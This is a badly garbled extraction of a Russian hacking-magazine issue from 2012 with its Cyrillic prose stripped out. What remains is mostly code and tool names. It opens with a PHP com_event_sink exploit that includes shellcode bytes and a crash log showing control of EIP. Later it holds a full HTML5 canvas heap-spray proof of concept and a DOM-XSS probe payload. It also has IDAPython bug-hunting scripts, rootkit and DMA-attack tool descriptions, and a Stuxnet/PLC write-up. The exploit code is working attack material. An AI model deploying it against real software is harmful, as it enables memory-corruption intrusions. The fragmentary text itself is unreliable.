//048d0190
echo strlen($axespray);
//19200 == 4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)
{
$deodrant.=$axespray;
}
$terminate = "T";
$u[] =$deodrant;
$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
$vVar = new VARIANT(0x048d0000+180);
$buffer = "\x90\x90\xcc\xcc\x41\<_x41>";
$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
?>
:
(cb0.7d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any
exception handling.
This exception may be expected and handled.
eax=048d0180 ebx=00000000 ecx=00c1f9b0 edx=0114dbc8
esi=048d00b4 edi=0114dc20 eip=41414141 esp=00c1f974
ebp=00c1f9dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
41414141 ?? ???
- .
TARGETS
PHP 5.3.4 , , .
SOLUTION
, .
12 /167/ 2012
AUTOMATED
TELLER
MACHINE
?
? ?
, -
?
(olga.v.kochetova@gmail.com)

(ATM Automated Teller Machine)

, ,
, , .

(1939 )
. - (
-)
200 ,

City Bank of New York,
,
.

-,
De La Rue (
).
Barclays,

, .

, ,
27 1967 Barclays. ,
.
,
60-, 10 .

, PIN- (PIN Personal Identification
070
Number). ,
.

1972 Citibank, City
Bank of New York ,
, . online-,
Cash-Point,
1972 Lloyds. IBM ,
.

(Cash In) (Cash Recycling).

, 2,45
;

(Longyearbyen, Svalbard, Norway),
-
(McMurdo Station, Antarctica).

NCR Diebold
Wincor Nixdorf.

Nautilus Hyosung. (cardholder
)

DORS.
Lobby (
) Through The Wall (
). Cash Out ( ), Cash In + Out ( + , ) Cash
Recycling ( ).
, ,
, .
?
,
,
, , , ,
, .
,
.
.
,
.

.
. Windows
12 /167/ 2012
XP SP2/SP3, Embedded/
POSReady-
Windows NT OS/2.
- Linux.

,
. , ,
,
.

dc-; NDC DDC direct connect
, NCR
Diebold .
, . dc ,
,
. ,
.

,

!

,
TCP/IP ( X.25).
,
.
.
,
( , ), UPS,
.
12 /167/ 2012

,
.

, ,
. / , / , . ,
,
,
, ,
, ,
.
,
.
,

.

,
,
.

.
,
Track2, .
, -,
.

,
. , .

, -
,
.
,
PIN PAD
PIN- EPP- (Encryption PIN Pad),
.
TripleDES
( DES, RSA),
,
.
,
,
. . PIN-
, PIN-,
.
PIN-
, . ,
PIN- , -
.
,
.

, ,
.
PIN- .

.

, -,
.
,
Epic Fail
071

,
,
PIN.
-, ,

.
,
.
,
.
;
, .

,
.

, , .
.

; ,
.
.

.
;
,
, .
, ,
.
,
.
,
, .
, , , ,
- .

, (Cash
Out), .
,
.
(,
), - - (
), ,
(
), (
), (
) (,
- ).

( , ) -
072
,

.
:
,
.

;
, ,
, ,
.

,
.
:
, , . :).
PIN-
,
.
,

.
-
, , ,
.
-
30 .
, ,
,
. ,
30 .
,
,
;
.
-

!
,
. ,
.
: ,

.
,
,
:).
- ,
.
. .
,

.
,
, -
( ) (
) , 13-
.
!
.
,
.

- ( ,
, ).
.
,
, ,
.
GPS-,
, -
. - :
600 1500
.

, ,
.
, ,

. ,
,
,
;).
! z
12 /167/ 2012
, , ,
, .

,

.

.
4
1

.

,
.
5
2
3

. ,
,
.
6
5
.

.
?
,
.

touch,
,
.

. ,

.
, -.
8
9

PIN-,
.
,
.
12 /167/ 2012

(
),
( )
,
.

.

3000 ().
,
.
073
, (oxdef@yandex-team.ru, oxdef.info)
2.0
WARNING
. ,
,
.
flickr.com/photos/kwl
-
- .
, -
- . -
: , , , , .
.
.
, , ,
, - , ,
-. - .
-
:
-.
HTTP- ( ),
. ,
POST-
URL http://example.com/
auth.php.
(. crawling). ,
- ,
HTTP-: , ,
.
(. fuzzing) ,
HTTP-
, - XSS, SQLi ) XSS, SQLi
, ) .
074
, , .
, , . . -,
, -
HTML JavaScript CSS.
, . 2.0 index.html !
JavaScript HTML (
, - JavaScript). HTML-
.
.
Authorization
Crawling
Fuzzing
Reporting
. 1.
12 /167/ 2012
2.0
. 2.
. 3. Itter
HTTP- , .
. , , , Lynx
Mosaic, Firefox Chrome,

.
-
-. , 1.0, GET/POST-.
:
?
GET-? POST-?
, XML- JSON-?
-?
AJAX (, );
, ;).
, ,
,
DOM-based XSS. ,

JavaScript. , JavaScript, .
.

-
- ,
( , 2.0)
- Itter. -,
, , ,
:). :
LAMP (Linux-Apache-MySQL-PHP) ;
, , ;
;
DOM-based XSS
sectools.org
Web Scanners. :
(
nikto );
- -.
, , .
- AJAX-. Q. E. D.

.
, , AJAX .
:
HTTP- ;
, .
?
:
JavaScript- URL-
JavaScript-.

HTTP-.
QA-,
Selenium.

.
AJAX-
- , grep- w3af (trunk version)

JavaScript-, domXSS
Skipfish (2.05b-1)
wapiti (1.1.6)
BurpProxy (1.4.01)
ZapProxy (1.3.2)
Acunetix (8.0)
12 /167/ 2012
JavaScript TODO
Spider
spider + attack modules

CSA ( MS
IE )
075

API - .
JavaScript-
( )
URL-. JavaScript, ,
.
. ,
- HTTP- - (, -)
.
!
. ,
.
.
, - . ,
SDLC.
Selenium. -?

:).
HTTP- -. ,
, , .
(, bitly.com/Q99GX5 slidesha.re/Pp8Bt2).

- (, Microsoft IE
WebKit) JavaScript-.
.
. -
API-, HTTP-. ,

, , ,
API.
WSDL- SOAP.
.
WEB20SPIDER
,
, , .
.

- . -
- .
- -.
( 2.0 ) . AJAX HTTP-
( ) . -
, . - (
)
( )
JavaScript. , -
076
. 4. Itter, w3af
Browser
URL, Cookies, Script
Scanner
Fuzzable
Requests
Web App
HTTP Transactions
Proxy
. 5. Web20Spider
,
,
.
,
-. , ,
, URL -. , URL http://example.com/app/#settings.

-
, ,
( a) ( img).
, .
( ,
, , ). ,

.
,
Gecko, WebKit...
, ,
, WebKit .
,
- ,
JavaScript?! , , PhantomJS,
. WebKit,
JavaScript
CoffeeScript. , , , (New BSD License) .
,
.
console.log('Loading a web page');
var page = require('webpage').create();
var url = 'http://www.phantomjs.org/';
page.open(url, function (status) {
phantom.exit(); //Page is loaded!
});
, DOM-based XSS:
var page = new WebPage();
var url = "http://example.com/foo.php";
12 /167/ 2012
2.0
if (states.indexOf(tmp_url) == -1) {
to_visit.push(tmp_url)
}
}
this.back();
}
});
});
}
. 6. PhantomJS
. 7. CasperJS
}
});
. 8 . w3af
};
var token = 'xss';
var payload = '?"><script>document.title=String.
fromCharCode(' + str2ascii(token) + ')</script>';
url = url + payload;
page.open(url, function (status) {
if (status !== 'success') {
console.log('Unable to load the address!');
phantom.exit();
}
var title = page.evaluate(function () {
return document.title;
});
if (title == token) {
console.log('DOM-based XSS is found in\nURL: ' +
url);
}
phantom.exit();
});
. -
DOM- . document.title.
PhantomJS
, .

CasperJS, , , PhantomJS
, , JavaScript.
-,
PhantomJS/CasperJS,
:
//...
process_page = function () {
var url;
if (to_visit.length > 0) {
url = to_visit.pop();
states.push(url)
} else {
return;
}
this.thenOpen(url, function () {
var links = this.evaluate(getClickable);
for (var i = 0; i < links.length; i++) {
if (this.exists(links[i].path)) {
if (!need_follow_url(links[i].href)) {
continue;
}
this.thenClick(links[i].path).then(function () {
this.wait(300, function () {
var tmp_url = this.getCurrentUrl();
if (url !== tmp_url) {
if (get_domain(tmp_url) == target_domain) {
12 /167/ 2012
for (var i = 0; i <= max_deep; i++) {

casper.then(process_page);
}
//...
. to_visit URL, . states, , .

-
max_deep. need_follow_url ,
-. ,
- PoC, , ,
HTTP- a img. CSS-,
- XPATH.
.
w3af. , :
. .
, F
(Web Application Attack and Audit Framework)
, w3af .
PoC discovery- web20Spider
(bit.ly/SU7cc2),
PhantomJS JS-.
w3af
.
,
,
, . ,
JS-
,
!
-
-, .
,
. , !
,
, ,
.
- :). z
INFO
Invariant-Based Automatic Testing of Modern Web Applications by Ali Mesbah,
Arie van Deursen and and Danny Roest, bit.ly/zCxCd
Challenges in the Automated Testing of Modern Web Applications by Nathan
Hamiel, Gregory Fleischer, Seth Law and Justin Engler, bit.ly/Tx538l
077
(defconrussia@gmail.com)
WWW
WARNING
Heap
Spray: goo.gl/0MMxC;

HTML5 Heap
Spray: goo.gl/R6qLh.

. ,

,

.
HEAP SPRAY
HTML5 (?)
, -. ,
( ) , - . ,
, ,
, .
HEAP SPRAY HTML5

Heap
Spray. ,
. ,
-
(Heap Spray ,
, -
). ,
, Heap Overflow Useafter-free. JavaScript. ,
. ,
( Microsoft)
,
. EuSecWest
Heap Spray
JS-.
-,
, ...
Heap Spray ,
, . ,
JavaScript ActionScript,
078
. , , ,
, . ,
BMP-, . , BMP -.
,
, Heap Spray.
: - , ,
20 , ,
. : ,
(
, ). ,
0 00010000.

.
HTML5
. ,
BMP , ,
, . HTML5,
!
, , Canvas. :
canvas.
.
2D-.
, RGBA.
12 /167/ 2012
Heap Spray
var context = elem.getContext('2d');

var imgd = context.createImageData(256, 256);
fill(imgd, payload);
memory[i] = imgd;
};
}; < /script>
Canvas
, , ,
Heap Spray JavaScript.
: Web
Workers. (JavaScript-, ). ( , ...),
, :
worker.js
onmessage = function(e) {
var payload = [0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0xCC];
var imagedata = e.data;
for(var i = 0; i < imagedata.data.length; i++) {
imagedata.data[i] = payload[i % payload.length];
};
postMessage(imagedata);
};
.
.
main.html
var memory = Array();
window.onload = function() {
var workers = Array();
var MAX_WORKERS = 5;
for(var i = 0; i < 2000; i++) {
var elem = document.createElement('canvas');
elem.width = 256;
elem.height = 256;
var context = elem.getContext('2d');
var imgd = context.createImageData(256, 256);
if(i < MAX_WORKERS) {
workers[i] = new Worker('worker.js');
};
workers[i % MAX_WORKERS].postMessage(imgd);
workers[i % MAX_WORKERS].onmessage =
function(e) {
memory[i] = e.data;
};
};
Worker
RGBA .
!
, ImageSpray, .
PoC
<!DOCTYPE html>
< script >
var memory = Array();
function fill(imgd, payload) {
for(var i = 0; i < imgd.data.length; i++) {
imgd.data[i] = payload[i % payload.length];
};
};
window.onload = function() {
var payload = [0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0xCC];
for(var i = 0; i < 100; i++) {
var elem = document.createElement('canvas');
elem.width = 256;
elem.height = 256;
12 /167/ 2012
};
,
.
,
, -
.
. , : , ( Firefox).
Heap Spray,
. :). z
079
Dharm (twitter.com/sky5earcher)

. ,

,

.
ALLOC/FREE
IDAPYTHON

. ,
IDAPython,
Python IDA Pro.

,
,
/ .
080
.
,
.
. alloc free : , ,
.
, 1.

alloc-
, . .
2 , malloc
.
Steam, TGA.
add eax,eax
add eax,eax
push eax
call malloc_wrapper
, ,
.
: , , ,
12 /167/ 2012
flickr.com/people/gtall1
WARNING
double free
call alloc
call free
mov
shl
lea
mov
push
call
eax, [ebp+arg_0]
eax, 2
ecx, [eax+eax+30h]
esi, esp
ecx
;Size
ds:malloc
. 2. Steam
use-after-free
call
mov
inc
lea
push
call
ds:_imp_lstrlenW@4 ; lstrlenW(x)
esi, eax
esi
eax, [eso+esi]
eax
;cb
_imp_CoTaskMemAlloc@4 ; CoTaskMemAlloc(x)
. 3.
. 1.
.
malloc .
LocalAlloc, SysAllocString . -
, alloc
.

push. , LocalAlloc
push, malloc push. integer overflow ,

(, strlen-like ).
3.
,
#
maths=['inc','add','mul','imul','lea','movsx',
'dec','sub','shl','shr']
# malloc push
for step in range(5):
ea=RfirstB(ea)
#
SetColor(ea,CIC_ITEM,0xcbe4e4)
if GetMnem(ea)=='push':
#
if GetOpnd(ea,0)==5:
break
#
traceval=GetOpnd(ea,0)
break
step=+1
while ea!=parent:
ea=RfirstB(ea)
#
if GetOpnd(ea,0)==traceval:
#
#
if GetMnem(ea) in maths:
if GetMnem(ea)=='lea':
# lea
if '+' not in GetOpnd(ea,1):
break
#
print 'La vida Alloca at address',hex(ea)
12 /167/ 2012
.
,
.

The Art of Software Security Assessment
, ,
. Windows . user mode LocalAlloc,
SysAllocString, realloc kernel mode ExAllocatePoolWithTag.
,
, MIDL_user_allocate. ,
LocalAlloc ( ) , NtAdjustPrivilegesToken.
push
push
mov
call
lea
push
push
push
mov
push
push
push
call
eax ; uBytes
ebx ; uFlags
[ebp+arg_4], eax
ds:LocalAlloc(x,x)
ecx, [ebp+uBytes]
ecx
eax ; all input are evil!
[ebp+arg_4]
[ebp+hMem], eax
[ebp+var_4]
ebx
[ebp+var_8]
edi ; NtAdjustPrivilegesToken(x,x,x,x,x,x)
,
(cmp, test). ,
. , :
tests=['cmp','test']
ea=Rfirst(ea)
if GetMnem(ea) in tests:
if GetOpnd(ea,0)=='eax' or GetOpnd(ea,1)=='eax':
break
print 'No check return value at address',hex(ea)
step=+1

, ,
. , IDA
malloc:
081

mov
eax, [ebp+ptr]
push
eax
;Memory
call ds:free
add esp, 4
cmp esi, esp
call unkonown_libname_1: Microsoft VisualC 2-9/net runtime
loc_40114A
mov
esi, esp
mov
eax, [ebp+ptr]
push
eax
;Memory
call
ds:free
add
esp, 4
cmp
esi, esp
call unknown_libname_1 : Microsoft VisualC 2-9/net runtime
mov
esi, esp
mov
eax, [ebp+ptr]
. 4. ptr
for seg_ea in Segments():

for ea in Heads(seg_ea, SegEnd(seg_ea)):
if isCode(GetFlags(ea)):
if GetMnem(ea) == "call":
if re.match('.*malloc.*',GetOpnd(ea,0)):
allox.append(ea)
.
,
.
, .
PRAY-AFTER-FREE
Use-after-free ,
.
( double free).
- CVE2012-0469, CVE-2012-1529, CVE-2012-1889.
,
( ),
( ).
,
. .
.
, 4.
, ptr . :
#
while ea!=0xFFFFFFFF:
ea=Rfirst(ea)
# - ?
if GetOpnd(ea,0)==traceval or
GetOpnd(ea,1)==traceval:
print "may be used after free",traceval,hex(ea)
double free use-after-free ,

.

, , , double-free
(goo.gl/9z5Fb).
082
ptr = (char *) malloc((size*4+sizeof(buf)*4)*2);

func2(buf,ptr);
int func2(char *buf, char *ptr) {

free(ptr);
free(ptr);//
printf( "%p", ptr);//
}
. 5. ptr free
,
. double
free , use-after-free,
. ptr
free .
IDA -,
5.
,
. free. . HeapFree, free,
VirtualFree
push.
,
, .

( ).
.
free ,
, .
# IDA
#
SetColor(ea,CIC_ITEM,0xe5f3ff)
#
ea=RfirstB(ea)
; int_edecl func2(int, void *ptr)

func2 proc near
var_C0= byte ptr -0C0h
ptr= dword ptr 0ch
push ebp
mov
ebp, esp
sub
esp, 0C0h
push ebx
push esi
push edi, [ebp+var_C0]
mov
ecx, 30h
mov
eax, 0CCCCCCCCh
rep stosd
mov
esi, esp
mov
eax, [ebp+ptr]
push eax
;Memory
call ds:free
. 6. func2
12 /167/ 2012
mov
mov
push
lea
push
call
[ebp+ptr], eax
eax, [ebp+ptr]
eax ;ptr
ecx, [ebp+var_1C]
ecx ;int
wrapper_func2
. 7. , func2
# :
if GetColor(ea,CIC_ITEM)==0xe5f3ff:
break
# free
if GetMnem(ea)=='call':
if 'free' in GetOpnd(ea,0):
ea=RfirstB(ea)
if GetMnem(ea)=='push':
# pusha
val=GetOpnd(ea,0)
break
step=+1
#
ea=RfirstB(ea)
if GetMnem(ea)=='mov':
val=GetOpnd(ea,1)
break
step=+1
#
if val==traceval:
print 'double free', hex(ea)
, IDA (idb),
,
,
, . :
def Cleaner(ea):
#
downea=ea
#
SetColor(ea,CIC_ITEM, 0xFFFFFFFF)
#
ea=RfirstB(ea)
# ?
if GetColor(ea,CIC_ITEM)!=0xFFFFFFFF:
#
SetColor(ea,CIC_ITEM, 0xFFFFFFFF)
#
else:
break
while downea!=0xFFFFFFFF:
#
downea=Rfirst(downea)
#
if GetColor(downea,CIC_ITEM)!=0xFFFFFFFF:
SetColor(downea,CIC_ITEM, 0xFFFFFFFF)
else:
break
12 /167/ 2012

. ,
free, ,
, .

.

, ,

.
6 func2,
ptr. , 7.
stdcall, ptr func2
pusha.
.
:
1. . ( , )
func2 ( ).
,
:
#
stack_frame = GetFrame(get_screen_ea())
#
frame_size = GetStrucSize(stack_frame)
#
stk_vars=[]
while frame_counter < frame_size:
#
stack_var = GetMemberName(stack_frame, frame_counter)
if stack_var!=None:
print " Stack Variable: %s " % (stack_var)
#
stk_vars.append(stack_var)
frame_counter += 1
#
for var in stk_vars:
print "stack var:",var
2. . , .
3
( ptr ).
IDA
Pro (www.hexblog.com/?p=42). , ,
,
, : ,
( double free), (malloc free). . ! z
083
D1g1 , Digital Security (twitter.com/evdokimovds)
X-Tools
WARNING

. ,

,
.

:
Ron Bowes
URL:
https://github.com/
iagox86/
hash_extender
:
Linux/Windows
:
James Forshaw,
Michael Jordon
URL:
contextis.com/research/tools/canape
:
Windows
:
Carsten MaartmannMoe
URL:
breaknenter.org/
projects/inception
:
Linux/Mac
HASH EXTENDER
CANAPE
Hash
length extension. - MD5,
SHA-1. ,
.

-
. ,
(secretkey+data), data, secretkey,
.
H(secretkey+data+appendata).
, ( padding, ,
), -
. hash_extender
.
:
- MD4/5,
RIPEMD-160, SHA/-1/-256/-512, Whirlpool;

, ,
;

.
Canape
,
.
,
,

.
, C# Python,
.

TCP- UDP-
port forwarding SOCKS-
HTTP-. Ethernet-, IP- TCP-
. , , ,
.

, MITM-.

,
. Black Hat Europe 2012.
Inception
, IEEE 1394 SBP-2 DMA.

Local Administrator / root
FireWire,
.
Inception
, ,
BitLocker, FileVault, TrueCrypt Pointsec.

, .
DMA

.
,
,
.
.
,
,

.
084
12 /167/ 2012

Nikto - ,
-
,
6500 ,
1250 (270).

, , HTTP-
- .
( )
. ,
.

,
stealth-.
:
prdelka
URL:
nullsecurity.net/
backdoor.html
:
Mac
, Nikto
LibWhisker,

IDS. :
SSL HTTP proxy;
;
plain text, XML, HTML,
NBE CSV;
;

;
LibWhiskers IDS ;

, favicons ;
- Basic NTLM;
;
Apache
cgiwrap;
;
:
Stephen Fewer
URL:
https://github.com/
stephenfewer/grinder
:
Windows
:
Chris Sullo,
David Lodge
URL:
www.cirt.net/nikto2
:
Windows/Linux

;
,
;
/
;
;
;
Metasploit.
:
SiRA Team
URL:
dl.siratool.com
:
Linux
PWN2OWN
IOS APPS
Windows Linux ,
Mac OS X
. Rubilyn kernel- Mac OS X 64bit.

BSD-,
syscall hooking DKOM.
OS
X Lion .

:
;
root- PID;
;
;
who/w;
netstat;
sysctl-
userland;
root magic ICMP ping.
Grinder - Pwn2Own 2011 (

Internet Explorer 8 64-bit Windows 7 (SP1)).
, ,
.
: Grinder- Grinder-.
Grinder-
,
,
,

.
: Chrome, Firefox, Internet Explorer,
Safari. .
Grinder- ,
Grinder-. -
. , ,

Grinder. ,
public, .
SiRA (Semi-automated iOS Rapid Assessment)

iOS-,
Black Hat USA 2012.
: Linux-,
, iOS-, jailbreak iPhone.
,
, ,
, , ,
,
.

:
;
;
;
;
;
iOS Keychain DB;
.

: #nullsecurity crew,
snare, dino, nemo, piotr, thegrugq, ZeroNights,
.
12 /167/ 2012
,
CruiseControl,
,

.
085
MALWARE
.
,
, Rutkit.Win32.Stuxnet.a. , (

) .

?

,
,
, , ,
.
,
,
.
1969

.
, ,
, , , ,
.

WWW

Stuxnet

Symantec
bit.ly/bxLMhg.
086
12 /167/ 2012

( )
-
(Modbus, Profibus, CANopen . .)

APM

, - ,

.

. :
( , )
.
SCADA, ,

,

. , , ,
, Stuxnet.
STUXNET
( , !)
,
Windows

, .
, , ,
Stuxnet Under the Microscope,
,
.
,
.
,
,
, - Stuxnet -
12 /167/ 2012

Siemens, . ,

.
,
Simatic S7.

:
1. OB.

.

,
, . , OB1

, , ,
OB84

.
2. FB FC.

.
3. DB.
.
, .
4. SDB. .
Step 7 ,
( ).
,
MC7, ,
(
).
Step 7 s7otbxdx.dll.
,
- , Step 7 s7otbxdx.dll s7blk_read,

Step 7. 109
.

Step 7 Stuxnet
s7otbxdx.dll ,
.
, :
s7otbxsx.dll. s7otbxdx.
dll ( 93)

Simatic S7 300
087
MALWARE

.
. :
s7_event
s7ag_bub_cycl_read_create
s7ag_bub_read_var
s7ag_bub_write_var
s7ag_link_in
s7ag_read_szl
s7ag_test
s7blk_delete
s7blk_findfirst
s7blk_findnext
s7blk_read
s7blk_write
s7db_close
s7db_open
s7ag_bub_read_var_seg
s7ag_bub_write_var_seg
,
Stuxnet , , ,
,
.
SDB.
, 6ES7-315-2. ,
SDB,
Profibus,

,
.
Profibus & Profinet
International .
Stuxnet 7050h 9500h, ,

, (

).

, DP_RECV,
Profibus. DP_RECV
FC1869,
, ,
DP_RECV
,
,

.
,
. , Stuxnet
OB1
OB35. OB1, ,
.
OB35 ,
100 .
Firmware
Ladder
Logic
Backdoors
Fuzzing
Web
N/A
N/A
Basic
Config
Exhaustion
Undoc
Features
Digital Bond
Basecamp
-
.

. , :
,

, , (IEC) 61131-3. :
LD (Ladder Diagram) -
. , ,
,
.
FBD (Function Block Diagram)
. ,
,
.
SFC (Sequential Function Chart) ,
- . , .
ST (Structured Text) , . , , ,
.
IL (Instruction List) ,
. .
IEC 61131-3, , , ,
.
088
, (, Step 7 Siemens, WPLSoft Delta Concept

Schneider Electric),
( , CoDeSys 3S).
, , :), LD CoDeSys
12 /167/ 2012
,
, .
, OB1 OB35,
:
, , .
DP_RECV

,

.
, Stuxnet
,

,
( ),
,
( ).
?...
Digital Bond
,
Stuxnet
Simatic S7-300.
Basecamp

:
General Electric D20ME;
Koyo Direct LOGIC H4-ES;
Rockwell Automation Allen-Bradley
ControlLogix;
Rockwell Automation Allen-Bradley
MicroLogix;
Schneider Electric Modicon Quantum;
Schweitzer SEL-2032 (
).

General Electric D20ME (, ). :
,
, , , ,

.
Koyo Direct
LOGIC H4-ES D20ME , . -,
, ,
IP e-mail,
.
12 /167/ 2012
INFO
DVD

,
,

(,
-
,

! .
.).
Stuxnet
ESET.

,
.
Delta DVP-40ES200
Modicon Quantum Schneider

Electric

.
- (
) , ( FTP-)
.
Rockwell Automation (AllenBradley) Schweitzer ,
Modicon
Quantum. ,
Digital Bond
: General Electric D20ME, Koyo Direct
LOGIC H4-ES, Rockwell Automation Allen-Bradley
ControlLogix Schneider Electric Modicon
Quantum ,

Metasploit.
Digital Security
Research Group Basecamp

.
Wago 750 Tecomat PLC.
Wago ,

-, .
Tecomat PLC
.

,
.
Delta
DVP-40ES200,

. ,
.
Delta DVP-40ES200

, , -,
(
), -,

.

,
, , .
GSM

,
GSM-, .
, .
GSM-.
, ,
, ,
,
.
, , ,
.
, -
-
. , ,
z

BASECAMP

089
MALWARE
(duminsky.nick@gmail.com)

,

. .
, . ,
, , .
- . ,
, IT- .
MITM-
,
, , .
,
,
. IT-
-
.

IT-,

. ,
IPS
, ,
.
, ,
. ,
.
,
, . - ,
.
.
090
, , ,
.
- :
,

. ,
,
,
. , :

,
.
,
,
.
,
,

, , ,
.
, ,
,

,
.
,
, ,
. : ,

. (
-, ,
), ,
, .
, ,
. ,

- .
, ,
,
.
,
.
, .
, . ,
, , ,
/
. ,
, ,

( ) .
12 /167/ 2012
,
:
1.
.
2.
.
3. .
4.
.
5.
.
? .
- , :
1. .
2. ,
.
, ,

( ) .
3 , ,
,
, ,
, - ,
.
:
, , , .

, ,

,
. -
,
.
,
, ,

,
,
, ,
. -.
, ,
.
?
. , ,
, : -
,
. ,

12 /167/ 2012
, , ,
. (
).
,
- ?
,
-.
, , ,
-, , .
-

. ,
,
, ,
, , , -.
, , ,
,
. -.
,
, ,
.
,
,
,

, .
, ( ).
,
,
,
, .
,
.
, ,
,
. - ,
.
IT, ,
. ,

.
, . .
, . , ,
,
,
,
.
,
,
.
, .
, , .
, ,
.
. , . ,
091
MALWARE
:

, .
,
,
.
, .
,
?

, . . : - .
...
,
,
. : ?
?
?,
?.
,
,
, ,
, ,
,
,
.

, .

, . ,
.

, ,
,
.
,
, ,

, .
,
,
, ,
, ,
.

. . ,
-
,
.
- .
, ,
.
, , .

.
. : ,
. , ,
, .
. .

, , , .
,
,
, ,
.
... ,
.
,
?
092
.
.

, ,

-
. , ,
.
. , . ,

:
,
,
.

,
. . . , -
- . .
, ,
. ,
, ,

, .

,
, .
, :
,
. ,
,
,
. , .
.
, ,
,
,
.
, ,
. , .
, ,
. , ,

. . z
12 /167/ 2012
Preview
110
HIGHLOAD

,

,
, .

.

.
, ,
- .
94
.
WP7-
.
.
UNIXOID
121

UNIX
. ,
.
12 /167/ 2012
UNIXOID
102
ANDROID
,
, ,

.
116

.
- GCC?
SYN/ACK
126
7-
.
132
Windows Server 2012

Active
Directory. - ?
093
yurembo , GenomeGames (www.pgenom.ru)
][-
WP,
.
: .
!
094
12 /167/ 2012
][-: .

, . !
: Windows Phone, SavePicture
( SavePictureToCameraRoll
) MediaLibrary.
: . /

, JPG. ,
-
! .

100%.
BMP.
, ,
-. ,
, BMP WP,
- .
PNG. , BMP,
, JPG. , PNG
Deflate. PNG
. , PNG
WinPhone.
, CodePlex
ImageTools. ,
/ /
. WriteableBitmapEx, Silverlight
WinPhone.
WP, .
,
ExtendedImage, ImageTools.
.
.
, .
. ,
ToolStack C# PNG Writer Library, bit.ly/P9q7m7.
: ToolStackCRCLib.cs,
ToolStackPNGWriterLib.cs ToolStackPNGWriterWBext.cs.
, . CRC32,
PNG-.

Windows Phone,
. WP,
, :).
12 /167/ 2012

BMP. ,
WP7
Adler32
zlib-.
,
,
,
.
ToolStackPNGWriterLib.cs
PNG-. PngChunkTypes
.
PngHeader , : ,
, .
PNGWriter
.
WriteableBitmap, , PNGWriter
PNG.
WriteableBitmap, WriteableBitmapEx (
).
,

. .
HideTextInImage
myCam_CaptureImageAvailable :
var isoStore = IsolatedStorageFile.
GetUserStoreForApplication();
String fileName = "photo " + GetRealTime() + ".png";
var pngDest = new System.IO.IsolatedStorage.
IsolatedStorageFileStream(fileName,
FileMode.Create, isoStore);
wb.WritePNG(pngDest);
pngDest.Flush();
pngDest.Close();
wb = null;
mesStream = null;
keyStream = null;
.
, .
GetRealTime,
, ,
: . . photo,
png.

. . , ,
.
095

.
. ,

. , , 1600 1200 (
) 7 ,

. ,
, PNG
2048 1536 .

,

-
Windows ( , ?
, , ,
Windows Mobile 6.? . .).
,
(Chooser) PhotoChooserTask, , ,
: , . , , - . . MainPage.xaml.cs :
private void GetFiles() {
listBox1.Items.Clear();
var storeFile = IsolatedStorageFile.
string fileString = System.IO.Path.GetFileName("*");
string[] files = storeFile.GetFileNames("*");
for (int i = 0; i < storeFile.GetFileNames("/" +
fileString).Length; i++) {
String fileName = storeFile.GetFileNames(fileString)[i];
String ext = fileName.Substring(fileName.Length - 3);
if (ext == "png") listBox1.Items.Add(fileName);
}
}
png
. , ,
. ,
, .
. . ,
,
. png,
,

ListBox.
( ) :
? ,
,
,
WM 6.?
096
. 1.
. 2.
OnNavigatedTo GetFiles();.
( ),
, , ,
, (. 1).

.
,
.

: SelectionChanged Tap ListBox.
(), . , :
ListBoxItem selectedItem = this.listBox1.
ItemContainerGenerator.ContainerFromItem(this.
listBox1.SelectedItem) as ListBoxItem;
String fileName = selectedItem.DataContext.ToString();
var isoStore = IsolatedStorageFile.
BitmapImage source = new BitmapImage();
using (IsolatedStorageFileStream fileStream = isoStore.
OpenFile(fileName, FileMode.Open, FileAccess.Read)) {
source.SetSource(fileStream);
source.CreateOptions = BitmapCreateOptions.None;
}
image1.Source = source;

. .
, .
, .
( ) PNG- WinPhone, ,
.
. ! BitmapImage,
: System.Windows.Media.Imaging; (. 2).
12 /167/ 2012
][-: .
,
.
. DoubleTap.
ListBoxItem ( . ) :
using (var isoStore = IsolatedStorageFile.
GetUserStoreForApplication()) {
if (isoStore.FileExists(fileName)) {
listBox1.Items.Remove(listBox1.SelectedItem);
isoStore.DeleteFile(fileName);
}
}

, ,
. : try/catch ( ),
.

, , -
.
ExtractTextFromImage,
. ,
,
.
BitmapImage ( Tap), WriteableBitmap.
( MemoryStream), . . GetStream,
,
.
ExtractTextFromImage,
, . ExtractTextFromImage,

. .

.
(. ), , /
.

-

Windows Phone
, . , ,
.
.
SDK WP 7.1
ISETool.exe.
,
.
Windows Phone 7 Isolated Storage Explorer,

CodePlex
(wp7explorer.codeplex.com).
MSI-.
.
, . VS
(Project Add Reference)
Browse. , , Library (
: c:\Program Files (x86)\WP7 Isolated
Storage Explorer\Library\),
dll (IsolatedStorageExplorer.
dll). App.
xaml.cs.
12 /167/ 2012
. 3.
, .
.
( Application_Launching)

: IsolatedStorageExplorer.Explorer.
Start("localhost");. localhost
IP- ,
. , , Application_Activated,
.

: IsolatedStorageExplorer.Explorer.
RestoreFromTombstone();.

, -
. WP7
Isolated Storage Explorer ,
: View Other
Windows WP7 Isolated Storage Explorer.
(. 3).

.
P. S.
,
,

,
.
097
, WINDOWS
PHONE

(- PRINTSCREEN)
, GetColorComponent. .
, .
foundByte,
( ).
.
.
messageStream , .
Tap, . , ,
.
: . , (.
),
-,
. ,
,
, , .
Windows Phone. ,
.
, -,
. ,
.
,
, , ,
. ,
WP . WinPhone
,
. MMS
, , -
. , SDK ( ,
? . . ;)) .

,
. 32 (
, ,
:). . .).
PNG .
SkyDrive.

, .
.
: API Windows
Phone JPG,
.
, SkyDrive , ,
( . . .). , .
SkyDrive, .
PhotoMaker.
! z
WWW
!
,
, .

, ,
-, , -,
,
.
. , Windows Phone

(- printscreen).
,
.

, .
098
,
, .
: forum.
xda-developers.com/showthread.
php?t=1316199. (Screen Capturer)
, XAP-

Application Deployment, SDK (. 4).
Screen Capturer,

Start Capture Task. .
,
-
,
( ,
jpg).
Help, ,
.
codeplex.com
Microsoft Open
Source ,

Microsoft.
DVD

PhotoMaker.
][-
!

. ,

.
. 4. Application Deployment
12 /167/ 2012
Deeoni$
String-, :
1) ;
2) ;
3) ;
4) ( strcmp);
5) , ;
6) stream << .
, C++,
.
MyString
#include <iostream>
class MyString {
public:

,
.
.
, !
12 /167/ 2012
